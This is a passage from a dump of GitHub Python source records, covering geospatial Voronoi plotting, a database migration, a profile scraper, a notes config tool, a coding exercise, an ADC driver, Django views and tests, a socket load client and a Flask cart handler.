self.boundary = gpd.GeoSeries(union_poly)\n self.boundary.crs=\"epsg:4326\"\n if plot==True:\n fig, ax = plt.subplots(figsize=(12, 8))\n self.boundary.plot(ax=ax,color='gray')\n ax.axis('off')\n plt.show()\n\n def getShape(self,chain):\n \n _,chainDB=getDatabase()\n attrDB=next(item for item in chainDB if item['Name'] == chain)\n self.chain_gdf = gpd.read_file(self.shape_path+attrDB['shapeFile'])\n\n\n\n def justDots(self):\n fig, ax = plt.subplots(figsize=(12, 8))\n self.boundary.plot(ax=ax,color='gray')\n self.chain_gdf.plot(ax=ax,markersize=3.5, color='black')\n ax.axis('off')\n plt.show()\n \n def drawVoronoi(self):\n self.boundary = self.boundary.to_crs(epsg=3395)\n gdf_proj = self.chain_gdf.to_crs(self.boundary.crs)\n\n boundary_shape = cascaded_union(self.boundary.geometry)\n coords = points_to_coords(gdf_proj.geometry)\n\n poly_shapes,pts = voronoi_regions_from_coords(coords, boundary_shape)\n # fig, ax = subplot_for_map()\n \n arr_image = plt.imread(self.image_path, format='png')\n fig, ax = plt.subplots(figsize=(7/4,1))\n ax.axis('off')\n ax.imshow(arr_image)\n plt.show()\n\n fig, ax = plt.subplots(figsize=(12,8))\n \n plot_voronoi_polys_with_points_in_area(ax, boundary_shape, poly_shapes, coords,pts,points_markersize=20)\n ax.set_title('Voronoi regions for '+str(self.chain) +' chain in Singapore',fontsize=15)\n plt.tight_layout()\n ax.axis('off')\n plt.show()\n \n \n \n def getNearby(self,address='Marina Bay Sands',distance=0.03):\n url='https://developers.onemap.sg/commonapi/search?searchVal='+str(address)+'&returnGeom=Y&getAddrDetails=Y&pageNum=1'\n jsondata=requests.get(url).json()\n \n if len(jsondata['results'])>0:\n print('Found '+str(len(jsondata['results']))+ ' results, using the first default one')\n print(str(jsondata['results'][0]['ADDRESS']))\n lat=float(jsondata['results'][0]['LATITUDE'])\n long=float(jsondata['results'][0]['LONGITUDE'])\n # print(long,lat)\n \n local=gpd.GeoDataFrame()\n geoser=gpd.GeoDataFrame([Point(long,lat)])\n local['geometry']=geoser[0]\n \n local_buffer=gpd.GeoDataFrame()\n local_buffer['geometry']=local.buffer(distance)\n local_buffer.crs=\"epsg:4326\"\n \n \n bool_list=[]\n for i in range(len(self.chain_gdf)):\n 
bool_list.append(local_buffer.contains(self.chain_gdf.iloc[i]['geometry']).item())\n \n nearbyDF=pd.DataFrame()\n if(any(ele for ele in bool_list)==True):\n \n chain_inlocal=[i for i, x in enumerate(bool_list) if x]\n print('\\n'+str(len(chain_inlocal))+' chain Found')\n for j in range(len(chain_inlocal)):\n nearbyDF=nearbyDF.append(self.chain_gdf.iloc[chain_inlocal[j]])\n \n # print(pd.DataFrame(self.chain_gdf.iloc[chain_inlocal[j]]))\n \n \n \n \n else:\n print(\"\\nNo chain found at the given address\")\n self.boundary = self.boundary.to_crs(epsg=3395)\n gdf_proj = self.chain_gdf.to_crs(self.boundary.crs)\n local_buffer_proj = local_buffer.to_crs(self.boundary.crs)\n\n boundary_shape = cascaded_union(self.boundary.geometry)\n coords = points_to_coords(gdf_proj.geometry)\n\n poly_shapes,pts = voronoi_regions_from_coords(coords, boundary_shape)\n # fig, ax = subplot_for_map()\n \n arr_image = plt.imread(self.image_path, format='png')\n fig, ax = plt.subplots(figsize=(7/4,1))\n ax.axis('off')\n ax.imshow(arr_image)\n plt.show()\n\n fig, ax = plt.subplots(figsize=(12,8))\n \n plot_voronoi_polys_with_points_in_area(ax, boundary_shape, poly_shapes, coords,pts,points_markersize=20)\n local_buffer_proj.plot(ax=ax,color='red',edgecolor='black',alpha=0.5)\n ax.set_title('Voronoi regions for '+str(self.chain) +' chain in Singapore, with location radius of 3kms',fontsize=15)\n plt.tight_layout()\n ax.axis('off')\n plt.show()\n \n nearbyDF.reset_index(drop=True,inplace=True)\n # print(nearbyDF.head()) \n return nearbyDF\n \n \n \n \n \n \n \nif __name__ == '__main__':\n imvoronoit_class=imvoronoit(chain='MUSEUMS',notebook=False)\n imvoronoit_class.getBoundary(plot=True)\n imvoronoit_class.justDots()\n imvoronoit_class.drawVoronoi()\n nearbyDF=imvoronoit_class.getNearby(address='Bukit Timah' , distance=0.03)\n # \n \n\n \n","repo_name":"koulakhilesh/imvoronoit","sub_path":"scripts/imvoronoit.py","file_name":"imvoronoit.py","file_ext":"py","file_size_in_byte":6733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74251704486","text":"\"\"\"Base creation\n\nRevision ID: 6fb2120835e8\nRevises: \nCreate Date: 2022-09-09 22:56:26.218778\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '6fb2120835e8'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n    op.create_table('user',\n    sa.Column('user_id', sa.Integer(), autoincrement=True, nullable=False),\n    sa.Column('username', sa.String(), nullable=True),\n    sa.Column('name', sa.String(), nullable=True),\n    sa.Column('password', sa.String(length=255), nullable=True),\n    sa.Column('active', sa.Boolean(), nullable=True),\n    sa.PrimaryKeyConstraint('user_id')\n    )\n    op.create_table('list',\n    sa.Column('list_id', sa.Integer(), autoincrement=True, nullable=False),\n    sa.Column('name', sa.String(), nullable=True),\n    sa.Column('description', sa.String(), nullable=True),\n    sa.Column('creator_id', sa.Integer(), nullable=True),\n    sa.ForeignKeyConstraint(['creator_id'], ['user.user_id'], ),\n    sa.PrimaryKeyConstraint('list_id')\n    )\n    op.create_table('card',\n    sa.Column('card_id', sa.Integer(), autoincrement=True, nullable=False),\n    sa.Column('title', sa.String(), nullable=False),\n    sa.Column('content', sa.Text(), nullable=False),\n    sa.Column('deadline', sa.DateTime(), nullable=False),\n    sa.Column('completed_on', sa.DateTime(), nullable=True),\n    sa.Column('complete', sa.Boolean(), nullable=False),\n    sa.Column('parent_id', sa.Integer(), nullable=True),\n    sa.Column('creator_id', sa.Integer(), nullable=True),\n    sa.ForeignKeyConstraint(['creator_id'], ['user.user_id'], ),\n    sa.ForeignKeyConstraint(['parent_id'], ['list.list_id'], ),\n    sa.PrimaryKeyConstraint('card_id')\n    )\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.drop_table('card')\n    op.drop_table('list')\n    op.drop_table('user')\n    # ### end Alembic commands ###\n","repo_name":"antimatter96/mad1","sub_path":"project/migrations/versions/6fb2120835e8_.py","file_name":"6fb2120835e8_.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41396252673","text":"#! /usr/local/bin/python3\n# -*- coding: utf-8 -*-\n\n\nimport time\nimport re\nimport urllib\nfrom bs4 import BeautifulSoup\n\n\ndef get_soup(url, sleep=1.0):\n    time.sleep(sleep)\n    headers = {\n        'User-Agent':\n        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) \\\n        AppleWebKit/537.36 (KHTML, like Gecko) \\\n        Chrome/39.0.2171.95 Safari/537.36'\n    }\n    req = urllib.request.Request(url, headers=headers)\n    with urllib.request.urlopen(req) as response:\n        html = response.read()\n        soup = BeautifulSoup(html, \"html5lib\")\n    return soup\n\n\ndef main():\n    query = '男性'\n\n    page = 1\n    query = urllib.parse.quote(query)\n\n    # An infinite loop is not good\n    while True:\n        url = 'http://twpf.jp/search/profile\\\n?page={}&sort=modified&direction=desc\\\n&target=personal_tag&keyword={}'.format(page, query)\n        soup = get_soup(url)\n        results = soup.find_all('div', class_='profile clearfix')\n\n        for result in results:\n            user_id = re.match(r'@[^ ]+',\n                               result.find('div', class_='name').get_text())\n            if user_id is not None:\n                user_id = user_id.group(0)\n                print(user_id)\n        page += 1\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"daigo-kimura/profile-estimation-api","sub_path":"src/scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5945883128","text":"#! 
/usr/bin/env python3\n\nfrom nts.argument_parse import collect\nimport toml\nimport os\nimport json\n\nclass Config:\n def __init__(self, args_file):\n self.args = os.path.dirname(__file__) + '/../' + args_file\n self.file_path = os.path.expanduser(collect.Arguments(self.args).value(\"config\"))\n self.journal = collect.Arguments(self.args).value(\"journal\")\n self.debug = collect.Arguments(self.args).value(\"debug\")\n self.action = collect.Arguments(self.args).value(\"action\")\n self.list = collect.Arguments(self.args).value(\"list\")\n try:\n self.storage_path = os.path.dirname(os.path.dirname(toml.load(self.file_path).get(self.journal).get(\"journal_path\")))\n except AttributeError:\n self.storage_path = os.path.expanduser(\"~/.local/share/nts\")\n self.notebody = collect.Arguments(self.args).value(\"notebody\")\n self.subject = collect.Arguments(self.args).value(\"subject\")\n try:\n self.default_subject = toml.load(self.file_path).get(self.journal).get(\"default_subject\")\n except AttributeError:\n self.default_subject = None\n try:\n self.time_format = toml.load(self.file_path).get(self.journal).get(\n \"time_format\", \"%m/%d/%Y, %H:%M:%S\")\n except AttributeError:\n self.time_format = \"%m/%d/%Y, %H:%M:%S\"\n\n\n def values(self):\n return toml.load(self.file_path)\n\n\ndef check_for_configuration(config):\n if os.path.isfile(config.file_path):\n return config.values()\n else:\n default_journal_path = \"{}/default/journal.json\".format(config.storage_path)\n default_toml = {\"default\": {\"journal_path\": \"{}\".format(default_journal_path)}}\n user_set_path = input(\"Set path for config: [{}] ?\".format(config.file_path))\n if not user_set_path:\n user_set_path = config.file_path\n try:\n os.makedirs(os.path.dirname(user_set_path))\n except FileExistsError:\n pass\n with open(user_set_path, \"w\") as config_file:\n config_file.write(toml.dumps(default_toml))\n print(\"Configuration created.\")\n return Config(\"arguments.yaml\").values()\n\ndef check_for_journal(journal):\n journal_path = journal.get(\"journal_path\", \"\")\n if os.path.isfile(journal_path):\n return True\n else:\n print(\"Creating journal at {}\".format(journal_path))\n try:\n os.makedirs(os.path.dirname(journal_path))\n except FileExistsError:\n pass\n blank_journal = {\"posts\": []}\n with open(journal_path, \"w\") as journal_file:\n journal_file.write(json.dumps(blank_journal))\n return True\n\ndef run_cli(args):\n config_set = check_for_configuration(args)\n if config_set.get(args.journal):\n if args.debug:\n debug_output(config_set, args)\n journal_check = check_for_journal(config_set.get(args.journal))\n if journal_check:\n return [journal_check, 0]\n else:\n print(\"Error creating journal at {}\".format(args.journal))\n return False\n else:\n print(\"Journal not found: {}\".format(args.journal))\n return False\n\n\ndef add_notebook(args):\n current_notebooks = toml.load(args.file_path)\n new_notebook = input(\"New notebook name: ? 
\")\n if new_notebook:\n current_notebooks[new_notebook] = {\n \"journal_path\": \"{}/{}/journal.json\".format(args.storage_path, new_notebook)}\n with open(args.file_path, \"w\") as config_file:\n config_file.write(toml.dumps(current_notebooks))\n return [0, 0]\n","repo_name":"numbertheory/nts","sub_path":"nts/nts.py","file_name":"nts.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23915190774","text":"# In this simple exercise, you will create a program that will take two lists of\n# integers, a and b. Each list will consist of 3 positive integers above 0,\n# representing the dimensions of cuboids a and b. You must find the difference of\n# the cuboids' volumes regardless of which is bigger.\n\n# For example, if the parameters passed are ([2, 2, 3], [5, 4, 1]), the volume\n# of a is 12 and the volume of b is 20. Therefore, the function should return 8.\n\n# Your function will be tested with pre-made examples as well as random ones.\n\n# If you can, try writing it in one line of code.\n\nimport codewars_test as test\n\n\ndef find_difference(a, b):\n a_product = 1\n b_product = 1\n for number in a:\n a_product *= number\n for number in b:\n b_product *= number\n return abs(a_product - b_product)\n\n\n@test.describe(\"Fixed Tests\")\ndef fixed_tests():\n @test.it(\"Basic Test Cases\")\n def basic_test_cases():\n test.assert_equals(\n find_difference([3, 2, 5], [1, 4, 4]),\n 14,\n \"{0} should equal 14\".format(find_difference([3, 2, 5], [1, 4, 4])),\n )\n test.assert_equals(\n find_difference([9, 7, 2], [5, 2, 2]),\n 106,\n \"{0} should equal 106\".format(find_difference([9, 7, 2], [5, 2, 2])),\n )\n test.assert_equals(\n find_difference([11, 2, 5], [1, 10, 8]),\n 30,\n \"{0} should equal 30\".format(find_difference([11, 2, 5], [1, 10, 8])),\n )\n test.assert_equals(\n find_difference([4, 4, 7], [3, 9, 3]),\n 31,\n \"{0} should equal 31\".format(find_difference([4, 4, 7], [3, 9, 3])),\n )\n test.assert_equals(\n find_difference([15, 20, 25], [10, 30, 25]),\n 0,\n \"{0} should equal 0\".format(find_difference([15, 20, 25], [10, 30, 25])),\n )\n\n\n@test.describe(\"Random Tests:\")\ndef random_tests():\n from random import randint\n from functools import reduce\n\n for x in range(50):\n a = [randint(1, 30), randint(1, 30), randint(1, 30)]\n b = [randint(1, 30), randint(1, 30), randint(1, 30)]\n expected = abs(reduce(lambda x, y: x * y, a) - reduce(lambda x, y: x * y, b))\n\n @test.it(f\"testing for find_difference({a}, {b})\")\n def test_case():\n test.assert_equals(find_difference(a, b), expected)\n","repo_name":"JacksonJW/practice-problems-interview-prep","sub_path":"codewars/python/difference_of_volumes_of_cuboids.py","file_name":"difference_of_volumes_of_cuboids.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33386866381","text":"#!/usr/bin/env python3\n\nfrom enum import Enum\nimport logging\n\ntry:\n # latest Blinka supports x86 LinuxPC, but we don't at least not chips on I²C\n from adafruit_platformdetect import Detector\n if Detector().board.id == 'GENERIC_LINUX_PC':\n raise NotImplementedError\n\n import board\n import busio\n import adafruit_ads1x15.ads1115 as ADS\n # import adafruit_ads1x15.ads1015 as ADSxx\n from adafruit_ads1x15.analog_in import AnalogIn\n\n SIMULATED = False\nexcept NotImplementedError:\n SIMULATED = True\n\n class ADS(Enum):\n P0, P1, P2, P3 = 
range(0, 4)\n\nfrom .base import (AInDriver, IoPort, PortFunc)\n\nlog = logging.getLogger('DriverADS111x')\nlog.brief = log.warning # alias, warning used as brief info, info is verbose\n\nlog.setLevel(logging.WARNING)\n# log.setLevel(logging.INFO)\n# log.setLevel(logging.DEBUG)\n\n\n# ========== ADC inputs ==========\n\n\nadc_count = 0\n\n\nclass DriverADS1115(AInDriver):\n    \"\"\" A driver for TI's 16bit ADC ADS1113/4/5, and 12bit ADS1013/4/5\n    # back to defaults to enable our auto-detect\n    Chip variants:\n    ADS1x13 1 channel, no comparator\n    ADS1x14 1 channel, gain adjustable\n    ADS1x15 4 channel or 2 differential, gain adjustable\n    Sample rate and continuous mode not supported. Differential isn't yet.\n    \"\"\"\n\n    ADDRESSES = [0x48, 0x49, 0x4A, 0x4B]\n    CHANNELS = [ADS.P0, ADS.P1, ADS.P2, ADS.P3] # ATM no differential channels\n\n    @staticmethod\n    def is_ads111x(ads):\n        \"\"\" check power-on register defaults of ADS1113/4/5\n        \"\"\"\n        try:\n            buf = bytearray(8)\n            with ads.i2c_device as device:\n                device.write_then_readinto(bytearray([0]), buf, in_start=0, in_end=2)\n                device.write_then_readinto(bytearray([1]), buf, in_start=2, in_end=4)\n                device.write_then_readinto(bytearray([2]), buf, in_start=4, in_end=6)\n                device.write_then_readinto(bytearray([3]), buf, in_start=6, in_end=8)\n                # default is: in 0-1 differential, gain 2, 1 shot, 128SPS, comp low, no latch, disable comp\n                if buf[2:8] == bytearray.fromhex('8583 8000 7FFF'):\n                    return True\n                if buf[3:8] == bytearray.fromhex('83 8000 7FFF'): # TODO: DBG REMOVE_ME!\n                    return True\n                log.debug('I²C device @ 0x%02X returns 0x%s 0x%s 0x%s' +\n                          ' from reg 1..3, probably a different device,' +\n                          ' or already in use.',\n                          device.device_address,\n                          bytes(buf[2:4]).hex(),\n                          bytes(buf[4:6]).hex(),\n                          bytes(buf[6:8]).hex())\n        except Exception as ex:\n            log.debug('Exception %r', ex)\n            # pass # whatever it is, ignore device @ this adr!\n        return False\n\n    @staticmethod\n    def find_ports():\n        global adc_count # pylint: disable=W0603\n\n        io_ports = {}\n        if not SIMULATED:\n            # autodetect of I²C is undefined and risky, as some chips may react\n            # on read as if it was a write! 
We're on a pretty well defined HW though.\n i2c = busio.I2C(board.SCL, board.SDA)\n deps = ['GPIO %d in' % board.SCL.id, 'GPIO %d out' % board.SCL.id,\n 'GPIO %d in' % board.SDA.id, 'GPIO %d out' % board.SDA.id]\n\n # one loop for each chip type\n log.brief('Scanning I²C bus for ADS1x13/4/5 ...')\n for adr in DriverADS1115.ADDRESSES:\n try:\n ads = ADS.ADS1115(i2c, address=adr)\n if DriverADS1115.is_ads111x(ads):\n adc_count += 1\n for ch in DriverADS1115.CHANNELS:\n port_name = 'ADC #%d in %d' % (adc_count, ch)\n port_cfg = {'adr': adr, 'cnt': adc_count, 'in': ch}\n io_ports[port_name] = IoPort(PortFunc.Ain,\n DriverADS1115,\n port_cfg,\n deps)\n else:\n log.brief('I²C device at 0x%02X seems not to be an ADS1x15, probably a different device, or already in use.', adr)\n except Exception as ex:\n log.debug('%r', ex)\n # pass # whatever it is, ignore this device\n else: # SIMULATED\n deps = ['GPIO 2 in', 'GPIO 2 out']\n adc_count += 1\n port_name = 'ADC #%d in ' % adc_count\n # name: IoPort(portFunction, drvClass, configDict, dependantsArray)\n io_ports = {\n port_name + '0': IoPort(PortFunc.Ain, AInDriver, {'cnt': adc_count, 'in': 0, 'fake': True}, deps),\n port_name + '1': IoPort(PortFunc.Ain, AInDriver, {'cnt': adc_count, 'in': 1, 'fake': True}, deps),\n port_name + '2': IoPort(PortFunc.Ain, AInDriver, {'cnt': adc_count, 'in': 2, 'fake': True}, deps),\n port_name + '3': IoPort(PortFunc.Ain, AInDriver, {'cnt': adc_count, 'in': 3, 'fake': True}, deps)\n }\n return io_ports\n\n def __init__(self, cfg, func):\n super().__init__(cfg, func)\n self.name = 'ADC #%d (ADS1115 @0x%02X) in %d' % (cfg['cnt'], cfg['adr'], cfg['in'])\n self.cfg = cfg\n\n self.gain = cfg.get('gain', -16)\n i2c = busio.I2C(board.SCL, board.SDA)\n self._ads = ADS.ADS1115(i2c, address=cfg['adr'], gain=(abs(self.gain)))\n self._ana_in = AnalogIn(self._ads, cfg['in'])\n\n def close(self):\n if self._fake:\n return super().close()\n\n # return chip to power-on defaults to allow future auto-detect\n self._ads.gain = 2\n self._ads.read(0, is_differential=True)\n\n def read(self):\n if self._fake:\n return super().read()\n\n self._adjust_gain()\n # val = self._ana_in.voltage\n median = [self._ana_in.voltage,\n self._ana_in.voltage,\n self._ana_in.voltage,\n self._ana_in.voltage,\n self._ana_in.voltage]\n median.sort()\n log.debug('median %f %f %f', median[0], median[2], median[4])\n val = median[2]\n\n return val\n\n def _adjust_gain(self):\n \"\"\" gain <= 0 is auto-gain.\n Since there's only a common gain for all channels,\n we need repeated conversions, and increase I2C traffic.\n \"\"\"\n ads = self._ads\n ads.gain = abs(self.gain)\n if self.gain <= 0:\n val = self._ana_in.value\n while abs(val) > 32300:\n l_gain = [ads.gains[0]] + [g for g in ads.gains if g < ads.gain]\n ads.gain = l_gain[-1]\n val = self._ana_in.value\n while abs(val) < 16000:\n h_gain = [g for g in ads.gains if g < ads.gain] + [ads.gains[-1]]\n ads.gain = h_gain[0]\n val = self._ana_in.value\n self.gain = -ads.gain\n log.debug('ADS gain %d (%d), digits %f', ads.gain, self.gain, val)\n","repo_name":"schwabix-1311/aquaPI","sub_path":"aquaPi/driver/DriverADC.py","file_name":"DriverADC.py","file_ext":"py","file_size_in_byte":7219,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"4679597907","text":"from django.test import TestCase\nfrom django.utils import timezone\n\nfrom core.tests.test_views import set_up_test_case_data\n\nclass MatchmakingTestCase(TestCase):\n\n @staticmethod\n def _get_url(id, 
type):\n return f'/{type}/{id}/matches'\n\n\n def setUp(self) -> None:\n set_up_test_case_data(self)\n \n def test_matchmaking_for_project(self):\n \n url = self._get_url(1, 'investors')\n response = self.client.get(url)\n matches_data = response.data\n\n self.assertEqual(len(matches_data), 1)\n self.assertEqual(matches_data[0]['id'], self.good_investor.id)\n self.assertEqual(response.status_code, 200) \n\n\n def test_matchmaking_for_investor(self):\n \n url = self._get_url(1, 'projects')\n response = self.client.get(url)\n matches_data = response.data\n\n self.assertEqual(len(matches_data), 1)\n self.assertEqual(matches_data[0]['id'], self.good_project.id)\n self.assertEqual(response.status_code, 200) \n","repo_name":"Wojlos/Projects-and-investors","sub_path":"recruitment_task/core/businesslogic/tests/test_matchmaking.py","file_name":"test_matchmaking.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12848132651","text":"from django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.db.models import Q\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.urls import reverse_lazy\nfrom django.views.generic import ListView, DetailView, CreateView\n\nfrom .forms import *\nfrom .models import *\nfrom django.utils import timezone\n\n\ndef home(request):\n context = {}\n limit = 10\n posts = Post.objects.all()[:limit]\n context['posts'] = posts\n return render(request, 'goods/home.html', context)\n\n\ndef categories(request):\n context = {\n 'categories': Category.objects.all(),\n 'children':Category.objects.all,\n }\n return render(request, 'goods/category.html', context)\n\n\ndef basket(request):\n return render(request, 'goods/basket.html')\n\n\n# def user_login(request):\n# if request.method == 'POST':\n# form = LoginForm(request.POST)\n# if form.is_valid():\n# cd = form.cleaned_data\n# user = authenticate(username=cd['username'], password=cd['password'])\n# if user is not None:\n# if user.is_active:\n# login(request, user)\n# else:\n# form = LoginForm(request.POST)\n# return render(request, 'goods/u_login.html', {'form': form})\n\ndef signup(request):\n if request.method == 'POST':\n form = SignUpForm(request.POST)\n if form.is_valid():\n user = form.save()\n user.refresh_from_db() # load the profile instance created by the signal\n user = form.save()\n login(request, user, backend='django.contrib.auth.backends.ModelBackend')\n return redirect('home')\n else:\n form = SignUpForm()\n return render(request, 'signup.html', {'form': form})\n\n\ndef post(request, pk):\n post = Post.objects.get(pk=pk)\n form = CommentForm()\n if request.method == 'POST':\n form = CommentForm(request.POST)\n if form.is_valid():\n comment = Comment(\n author=form.cleaned_data[\"author\"],\n body=form.cleaned_data[\"body\"],\n post=post\n )\n comment.save()\n\n comments = Comment.objects.filter(post=post)\n context = {\n \"post\": post,\n \"comments\": comments,\n \"form\": form,\n }\n return render(request, 'goods/post.html', context)\n\n\nclass Search(ListView):\n template_name = 'search/search.html'\n context_object_name = 'posts'\n paginate_by = 5\n\n def get_queryset(self):\n return Post.objects.filter(\n Q(title__icontains=self.request.GET.get('s')))\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = 
super().get_context_data(**kwargs)\n context['s'] = f\"s={self.request.GET.get('s')}&\"\n return context\n\n\nclass PostsByCategory(ListView):\n template_name = 'goods/home.html'\n context_object_name = 'posts'\n allow_empty = True\n\n def get_queryset(self):\n return Post.objects.filter(category_slug=self.kwargs['slug'])\n\n def get_context_data(self, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = Category.objects.get(slug=self.kwargs['slug'])\n return context\n\n\nclass AddPage(LoginRequiredMixin, CreateView):\n form_class = PostCreateForm\n template_name = 'goods/createpost.html'\n success_url = reverse_lazy('home')\n login_url = reverse_lazy('home')\n raise_exception = True\n\n # def get_context_data(self, *, object_list=None, **kwargs):\n # context = super().get_context_data(**kwargs)\n # c_def = self.get_user_context(title=\"Добавление статьи\")\n # return dict(list(context.items()) + list(c_def.items()))\n\n\ndef addpost(request):\n if request.method == 'POST':\n form = PostCreateForm(request.POST, request.FILES)\n if form.is_valid():\n post = form.save(commit=True)\n post.author = request.user\n form.save()\n return redirect('home')\n else:\n form = PostCreateForm()\n return render(request, 'goods/createpost.html', {'form': form})\n\n\ndef profile(request):\n # profile = User.objects.POST.get(pk=pk)\n # context = {\n # 'profile': profile,\n #\n # }\n return render(request, 'goods/profile.html')\n\n# class ProfileDetail(DetailView):\n# model = Profile\n# context_object_name = 'profile'\n# template_name = 'goods/profile.html'\n","repo_name":"DrBATCOH/django-project-website-","sub_path":"website/goods/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28139071813","text":"#!/usr/bin/env python3\nimport socket\nimport sys\nimport time\nimport random\nfrom _thread import *\nfrom threading import Thread, Lock\n\n# PORT at which the server runs\nSERVER_PORT = 1234\n\n# Some of the requests which are CPU intensive and take more time to process at the server end \nload_list = [22,23,24]\n\n# Client thread will execute this function\ndef client_thread(SERVER_IP):\n # Notifying this thread about all the relevant global variables\n global load_list\n\n # List of all sockets\n socketsList = []\n \n try:\n # Creating and appending the socket to the sockets list\n socketsList.append(socket.socket(socket.AF_INET, socket.SOCK_STREAM))\n\n # Connecting to the server\n socketsList[len(socketsList) - 1].connect((SERVER_IP, SERVER_PORT))\n\n while True:\n # Send requests to server following the round-robin policy\n for i in range(0, len(socketsList)):\n socketsList[i].sendall(str(random.choice(load_list)).encode('utf-8'))\n response = socketsList[i].recv(1024)\n result = int(response.decode('utf-8'))\n print(\"Received the result : \" + str(result))\n time.sleep(1.5)\n except:\n print(\"Error occurred while creating socket!\")\n\n# The main thread will start other threads\ndef Main():\n print(\"Server IP : \" + str(sys.argv[1]))\n client = Thread(target=client_thread, args=(str(sys.argv[1]), ))\n client.start()\n # The main thread will wait for the client thread to complete its execution\n client.join()\n\nif __name__ == '__main__':\n 
Main()","repo_name":"pradhanaditya/CS695-Container-Runtime","sub_path":"testcases/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23512812499","text":"# Flask related\nfrom flask import Flask, request, render_template\nfrom flask import jsonify\nfrom flask_pymongo import PyMongo\n\n# Standard library\nimport json\nimport datetime as dt\nfrom bson import json_util\nimport uuid\n\nfrom inventory_func import inventory_management\n\ndef cart_management(input_json, used_db, response_json):\n\tdict_temp = dict({key:val for key, val in input_json.items() if (key != '_id') & (key != 'event')})\n\tdict_temp[\"last_modified\"] = dict_temp.pop(\"event_timestamp\")\n\tdict_temp[\"payment_status\"] = 0\n\t\n\tcoll = used_db[\"shopping_cart\"]\n\n\tquery_temp = {\"customer_id\": dict_temp[\"customer_id\"], \"payment_status\": dict_temp[\"payment_status\"] }\n\t\n\t# Check current customer's cart\n\tcheck_existing = coll.find_one(query_temp)\n\n\tif input_json[\"event\"] == \"get_item\":\n\n\t\tdict_temp[\"cart\"] = [dict_temp.pop(\"item\")]\n\n\t\tresult = 0\n\n\t\tif not check_existing:\n\t\t\t# Add new cart when customer is not flagged yet\n\t\t\tresult = coll.insert_one(dict_temp)\n\t\telse: # Existing cart\n\t\t\t# Loop cart item\n\t\t\tfor i in dict_temp[\"cart\"]:\n\t\t\t\tfor j in check_existing[\"cart\"]:\n\t\t\t\t\t# If existing item is found, add quantity\n\t\t\t\t\tif (i[\"inventory_id\"] == j[\"inventory_id\"]):\n\t\t\t\t\t\tquery_temp[\"cart.inventory_id\"] = i[\"inventory_id\"]\n\t\t\t\t\t\tresult = coll.update_one(query_temp, { \"$set\": { \"last_modified\": dict_temp[\"last_modified\"]}, \"$inc\": {\"cart.$.quantity\": i[\"quantity\"]} })\n\t\t\tif not (result):\n\t\t\t\t# if no existing item, add item to cart\n\t\t\t\tresult = coll.update_one(query_temp, { \"$set\": { \"last_modified\": dict_temp[\"last_modified\"]}, \"$push\": {\"cart\": i} })\n\n\t\tif (result):\n\t\t\tresponse_json[\"message\"] = \"item added to cart\"\n\t\telse:\n\t\t\tresponse_json[\"message\"] = \"error\"\n\n\telif input_json[\"event\"] == \"put_back\":\n\n\t\tdict_temp[\"cart\"] = [dict_temp.pop(\"item\")]\n\t\t\n\t\tresult = 0\n\n\t\tif not check_existing:\n\t\t\tresponse_json[\"message\"] = \"cart error/do not exist\"\n\t\telse:\n\t\t\t# Loop cart item\n\t\t\tfor i in dict_temp[\"cart\"]:\n\t\t\t\tfor j in check_existing[\"cart\"]:\n\t\t\t\t\t# If existing item is found, reduce quantity\n\t\t\t\t\tif (i[\"inventory_id\"] == j[\"inventory_id\"]):\n\t\t\t\t\t\t# Check if there is enough item on cart\n\t\t\t\t\t\tif (j[\"quantity\"]) > (i[\"quantity\"]):\n\t\t\t\t\t\t\tquery_temp[\"cart.inventory_id\"] = i[\"inventory_id\"]\n\t\t\t\t\t\t\tresult = coll.update_one(query_temp, { \"$set\": { \"last_modified\": dict_temp[\"last_modified\"]}, \"$inc\": {\"cart.$.quantity\": -i[\"quantity\"]} })\n\t\t\t\t\t\t\tresponse_json[\"message\"] = \"item quantity reduced from cart\"\n\t\t\t\t\t\telif (j[\"quantity\"]) == (i[\"quantity\"]):\n\t\t\t\t\t\t\tresult = coll.update_one(query_temp, { \"$set\": { \"last_modified\": dict_temp[\"last_modified\"]}, \"$pull\": {\"cart\": {\"inventory_id\": i[\"inventory_id\"]} } })\n\t\t\t\t\t\t\tresponse_json[\"message\"] = \"item removed from cart\"\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tresponse_json[\"message\"] = \"not enough item in inventory\"\n\t\t\tif not (result):\n\t\t\t\t# if no existing item, error message\n\t\t\t\tresponse_json[\"message\"] = 
